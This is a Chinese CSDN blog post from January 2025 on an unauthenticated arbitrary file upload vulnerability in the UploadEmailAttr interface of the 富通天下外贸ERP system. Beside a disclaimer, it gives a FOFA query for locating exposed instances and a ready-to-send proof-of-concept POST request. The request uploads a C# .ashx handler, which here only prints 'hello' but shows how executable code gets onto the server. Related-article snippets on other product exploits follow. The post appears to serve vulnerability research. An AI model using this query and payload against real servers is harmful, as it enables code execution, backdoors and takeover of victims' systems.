富通天下外贸ERP UploadEmailAttr文件上传漏洞

于 2025-01-07 23:17:13 发布
阅读量287 收藏
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yxr520yj/article/details/144995705
版权

0x1 免责声明

本文旨在提供有关特定漏洞或安全风险的详细信息,以帮助安全研究人员、系统管理员和开发人员更好地理解和修复潜在的安全威胁,协助提高网络安全意识并推动技术进步,而非出于任何恶意目的。利用本文提到的漏洞信息或进行相关测试可能会违反法律法规或服务协议。作者不对读者基于本文内容而产生的任何行为或后果承担责任。如有任何侵权问题,请联系作者删除。

0x2 fofa

title="用户登录_富通天下外贸ERP"

0x3 POC

# 文件上传地址为回显地址。
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded


<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("hello");
}
}

枫之沫
关注
外贸ERP 任意文件上传导致命令执行漏洞复现(XVE-2024-8865)
0xSec
04-24 1129
外贸ERP UploadEmailAttr接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
大华智能物联综合管理平台 fastjson远程代码执行漏洞复现
0xSec
05-11 2880
​由于大华智能物联综合管理平台使用了存在漏洞的FastJson组件,未经身份验证的攻击者可利用/evo-runs/v1.0/auths/sysusers/random接口发送恶意的序列化数据执行任意指令,造成代码执行。
大华智能物联综合管理平台 fastjson反序列化漏洞
一个努力学习网安的小牛马
05-14 1665
反序列化漏洞未公开
漏洞复现】大华-智能物联综合管理平台-random-远程命令执行
知黑而守白
02-01 1754
浙江大华技术股份有限公司智能物联综合管理平台是一款基于物联网技术的综合性管理平台,旨在为企业和用户提供智能化、便捷化的物联网解决方案。该平台整合了大华技术在视频监控、数据采集、数据分析等方面的核心技术,实现了对各类物联网设备的统一管理和控制,提高了企业的运营效率和管理水平。智能物联综合管理平台 random 接口处存在远命令执行漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
大华智能物联综合管理平台任意文件读取
weixin_43567873的博客
03-07 610
大华智能物联综合管理平台任意文件读取(QVD-2023-45063)
大华智能物联综合管理平台justForTest用户登录漏洞
qq_39573664的博客
12-27 3211
浙江大华技术股份有限公司智能物联综合管理平台 用户登录接口/evo-apigw/evo-oauth/oauth/token存在漏洞,使用用户justForTest/任意密码即可成功登录平台,造成信息泄露。
富通天下外贸ERPl漏洞
最新发布
04-03
富通天下外贸ERP存在UploadEmailAttr文件上传漏洞[^2]。此漏洞可能允许攻击者通过未授权的文件上传功能,在服务器上执行恶意脚本或程序,从而获取系统的控制权。 #### 影响范围 该漏洞主要影响使用富通天下外贸ERP...
工银聚富通支付异步通知报文参数
08-10
《工银聚富通支付异步通知报文详解》 工银聚富通支付异步通知报文是工商银行提供的一种在线支付系统与商户系统间进行交互的重要方式,它确保了支付过程中信息的及时传递和处理。这篇文档将详细介绍工银聚富通支付...
云计算应用开发与运维专题论坛-李瑞瑞 富通容器云助力企业数字化转型.pdf
06-06
本文档是一份关于云计算应用开发与运维的专题论坛资料,特别强调了富通容器云在助力企业数字化转型方面的作用。内容涉及的主题主要包括富通容器云的技术特性、企业数字化转型的必要性和实施方案,以及如何利用云计算...
富通助手-crx插件
04-04
富通助手-crx插件是专为富通天下云平台而设计的一款浏览器扩展工具,它采用CRX文件格式,通过一系列HTML、CSS、JavaScript代码和资源文件的组合,为用户带来了便捷的数据查询和管理服务。CRX格式是Chrome浏览器扩展...
【精品】大华“智慧消防” 物联网综合管理解决方案.pptx
06-25
【精品】大华“智慧消防” 物联网综合管理解决方案.pptx
SRC挖掘日常3
jennycisp的博客
05-06 929
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。如果你把每周要学的内容精细化到这种程度,你还会担心学不会,入不了门吗,其实说到底就是学了两个月,但都是东学一下,西学一下,什么内容都是浅尝辄止,没有深入进去,所以才会有学了2个月,入不了门这种感受。聊完宏观的,我们再落到具体的技术点上来,给你看看我给团队小伙伴制定的网络安全学习路线,整体大概半年左右,具体视每个人的情况而定。
大华智慧园区综合管理平台 sendFaceInfo RCE漏洞复现
0xSec
02-06 937
​由于大华智慧园区综合管理平台使用了存在漏洞的FastJson组件,未经身份验证的攻击者可利用/CardSolution/card/face/sendFaceInfo接口发送恶意的序列化数据执行任意指令,造成代码执行、服务器失陷的后果。
Fastjson批量检查及一键利用工具
qq_50854662的博客
10-30 4584
0x01 序章 上次讲解过手动利用fastjson,但讲的过于太简单了。根据大家的反应,收集如下几个问题。 1、如何盲打fastjson 2、判断fastjson的指纹 3、各版本payload以及使用ldap模式监听。 下面我就一一解答,我只是把我在网上查到的资料消化 后分享给大家,如果有大佬觉得哪里不对,还望不吝赐教。这次还带来了一键利用及检测工具,链接在文末。 注:本文仅用于技术讨论与研究,严禁用于任何违法用途,违者后果自负 0x02 环境搭建 这个不用多说了吧,使用vulhub搭建。 启动fastj
漏洞复现】大华智能物联ICC综合管理平台弱口令漏洞
晚风不及你
02-23 3593
大华智能物联ICC综合管理平台是一个集成了多种智能物联应用服务能力的平台。该平台提供了一系列的基础能力,如中台基础能力、各智能物联应用服务能力以及周边生态支持。
Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞
ZeroDay001的博客
11-21 198
Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞这是一个集内容管理与发布于一体的智能平台,广泛服务于新闻媒体及内容创作行业。平台支持多端协同和多渠道分发,拥有素材管理、内容编辑、智能审核等核心功能,并通过技术辅助创作与数据分析,显著提升内容生产效率与传播质量。从内容采集到发布实现全流程覆盖,优化工作流程,提高传播的精准度和时效性,帮助用户在数字化内容生态中实现高效协作与影响力扩展。
漏洞复现】大华ICC智能物联综合管理平台任意文件读取漏洞
晚风不及你
03-10 3432
大华智能物联综合管理平台 iConnection Center(以下简称:ICC平台),是一套基于智能物联的综合业务管理平台软件,具备强大的后台服务能力,配套了B/S管理员端、C/S客户端、移动APP终端、小程序等不同应用端,满足用户各种使用需求。
大华智能物联综合管理平台readpic接口任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
11-21 861
大华ICC智能物联综合管理平台对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。该系统存在任意文件读取漏洞,会造成敏感信息泄露。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值